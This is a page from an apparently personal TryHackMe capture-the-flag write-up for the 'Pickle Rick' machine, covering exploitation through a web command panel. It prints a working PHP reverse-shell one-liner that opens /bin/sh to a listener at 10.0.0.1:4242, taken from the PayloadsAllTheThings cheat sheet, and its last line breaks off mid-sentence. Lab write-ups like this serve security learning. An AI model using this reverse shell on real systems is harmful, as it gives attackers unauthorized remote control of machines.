🪓
THM
  • Machines
    • Easy Machines
      • Pickle Rick
        • Findings Log
        • Scouting
          • URL Source Code
          • Wappalyzer
          • NMAP
        • Enumeration
          • Initial Enumeration
            • Gobuster
            • Open Port Vulnerability Check
            • Nikto
          • Portal Page Enumeration
        • Exploitation
          • SSH- Pointless
          • Command Panel
            • Python Webserver
            • Payloadallthethings
          • Cookies
        • Escalation
      • Basic Penetration Testing
      • OhSINT
      • Crack the hash
      • RootMe
      • Simple CTF
Powered by GitBook
On this page
  1. Machines
  2. Easy Machines
  3. Pickle Rick
  4. Exploitation
  5. Command Panel

Payloadallthethings

PreviousPython WebserverNextCookies

Last updated 2 years ago

  • I decided to go through the list to see if something would work.

  • Nothing seemed to get a response until I started trying the php payloads.

  • Finally I got one to work on a netcat listener:

php -r '$sock=fsockopen("10.0.0.1",4242);$proc=proc_open("/bin/sh -i", array(0=>$sock, 1=>$sock, 2=>$sock),$pipes);'

  • Once I have access to the computer, I will search through it.

  • There is nothing in the current directory so

LogoPayloadsAllTheThings/Reverse Shell Cheatsheet.md at master · swisskyrepo/PayloadsAllTheThingsGitHub